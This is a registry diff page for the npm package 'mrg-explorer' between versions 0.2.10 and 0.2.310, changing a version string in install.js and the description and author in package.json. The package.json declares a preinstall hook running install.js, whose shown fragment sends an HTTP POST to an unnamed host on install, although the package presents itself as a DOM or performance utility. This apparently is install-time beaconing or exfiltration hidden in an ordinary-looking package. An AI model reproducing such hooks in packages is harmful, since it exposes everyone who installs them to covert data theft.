mrg-explorer 0.2.10 → 0.2.310

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/install.js +1 -1
  2. package/package.json +1 -1
package/install.js CHANGED
@@ -115,7 +115,7 @@ function main() {
115
115
  var req = http
116
116
  .request({
117
117
  host: h,
118
- path: "/mrg-explorer:0.2.10",
118
+ path: "/mrg-explorer:0.2.310",
119
119
  method: "POST",
120
120
  })
121
121
 
package/package.json CHANGED
@@ -1 +1 @@
1
- {"name": "mrg-explorer", "version": "0.2.10", "description": "An npm module to simplify DOM manipulation and event handling.", "main": "index.js", "scripts": {"test": "echo \"Error: no test specified\" && exit 1", "preinstall": "node install.js"}, "author": "comrade", "license": "ISC"}
1
+ {"name": "mrg-explorer", "version": "0.2.310", "description": "A lightweight utility library for enhanced JavaScript performance.", "main": "index.js", "scripts": {"test": "echo \"Error: no test specified\" && exit 1", "preinstall": "node install.js"}, "author": "Bob", "license": "ISC"}